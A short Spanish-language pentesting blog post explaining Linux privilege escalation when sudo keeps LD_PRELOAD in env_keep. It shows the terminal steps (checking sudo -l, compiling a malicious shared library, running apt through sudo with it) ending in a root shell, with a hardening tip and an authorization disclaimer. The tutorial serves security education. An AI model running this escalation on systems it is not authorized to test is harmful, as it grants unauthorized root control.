~ / blog / pentesting
KALI

Privesc con ld_preload

Si en la configuración de sudo aparece env_keep con LD_PRELOAD, tienes una escalada regalada.

LD_PRELOAD obliga a cargar una librería tuya antes que las del sistema. Compilas una librería mínima que, al cargarse, lanza una shell de root, y luego ejecutas cualquier comando con sudo pasándole tu librería.

Como sudo corre como root y respeta tu variable, la shell sale con privilegios. Nunca dejes env_keep con variables de carga.

# los comandos

www-data@victim:$ sudo -lcopiar
env_keep += LD_PRELOAD
(root) NOPASSWD: /usr/bin/apt
www-data@victim:$ gcc -fPIC -shared -o /tmp/x.so evil.c -nostartfilescopiar
www-data@victim:$ sudo LD_PRELOAD=/tmp/x.so apt updatecopiar
root@victim:# idcopiar
uid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.